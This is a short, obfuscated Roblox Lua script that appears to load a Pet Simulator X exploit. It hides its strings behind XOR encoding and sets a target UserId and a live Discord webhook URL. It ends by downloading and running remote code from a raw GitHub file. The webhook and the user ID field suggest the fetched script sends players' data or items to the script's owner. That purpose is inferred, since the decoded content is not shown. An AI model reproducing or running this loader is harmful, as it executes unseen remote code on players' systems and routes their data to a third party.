--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 
 
]]--
 
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + ((v11-1)% #v9) ,1 + ((v11-1)% #v9) + 1 )))%256 ));end return v5(v10);end UserId=(513319675 -(1213 + 115)) + 6265727 + 213480046 ;WebHook="https://discord.com/api/webhooks/1089191588812554271/HBvDCqqT2bgpuXJ3EhM7K8WRFzk9OJJNKawxlN0mqmBjkEKpKJarNKr18hy0V-TnXv_r";_G.CustomScriptName=v7("\222\230\15\205\112\36\34\231\197\35","\142\181\87\237\35\71\80");_G.Text1=v7("\205\253\216\114\201\69\68\210\241\203\127\220\85\74\176\176","\158\158\170\27\185\49\100");_G.Text2=v7("\49\189\188\71\60\117\121\70\186\186\65\117\72\125\20\181\165\71","\102\220\213\51\85\27\30");_G.Text3=v7("\192\91\170\138\232\90\161\142\163\96\172\155\234\67\187\154\173\29\225","\131\51\207\233");_G.Text4=v7("\245\185\55\221\210\164\56\200\134\158\53\221\207\189\34\220\136\227\120","\166\205\86\175");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimxgm.lua"))();
